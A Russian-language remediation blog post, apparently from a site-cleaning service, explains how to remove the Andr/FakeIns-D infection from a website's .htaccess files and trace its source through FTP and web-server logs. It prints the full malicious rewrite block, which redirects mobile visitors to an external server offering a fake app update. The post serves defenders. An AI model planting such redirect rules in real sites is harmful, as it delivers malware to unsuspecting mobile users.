ENG    РУС

Все заметки блога »

Вирус Andr/FakeIns-D на сайте. Инструкция по лечению.

Закажите лечение сайта и защиту от взлома у специалистов

Если на вашем сайте Яндекс определил троян (вирус) Andr/FakeIns-D, нужно посмотреть все .htaccess. В них будет содержаться код

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
...
RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
RewriteCond %{HTTP:Profile} .+ [NC,OR]
RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
RewriteCond %{QUERY_STRING} !noredirect [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC]
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]
RewriteRule ^(.*)$ http://someserver/?update&source=%{HTTP_HOST} [L,R=302]


Код можно найти по фрагменту
%{HTTP_USER_AGENT} android

Данный вирус при заходе посетителей с мобильных устройств выполняет мобильный редирект на сторонний сайт, где пользователю предлагается скачать вредоносный код под видом обновления какой-то андроидной программы (например, Flash Player или браузера Opera).

Для того чтобы вылечить сайт от Andr/FakeIns-D, нужно удалить данный код из всех .htaccess файлов.

После удаления вредоносного кода Andr/FakeIns-D нужно найти источник заражения. Это может быть взлом сайта через уязвимости в cms, заражение по ftp или заражение с соседних взломанных сайтов на том же эккаунте.

Для анализа необходимо запросить логи ftp сервера и веб-сервера для зараженного эккаунта (сайта).

В ftp логе нужно искать обращения к файлу .htaccess и проверять IP адрес, с которого выполнялось редактироввание. Для логов веб-сервера нужно смотреть вызовы скриптов методом POST.
Чтобы сократить интервал поиска по логам, можно посмотреть дату и время изменения .htaccess файла и искать записи в логе в окрестностях этого времени.

По окончании лечения сайта на сайте нужно обязательно поставить защиту от взлома, чтобы повторно вредоносный код не появился на сайте. Вы можете сделать это самостоятельно, либо обратиться к нам.

Читайте другие заметки блога.

Обсуждаем!

Подпишитесь на RSS: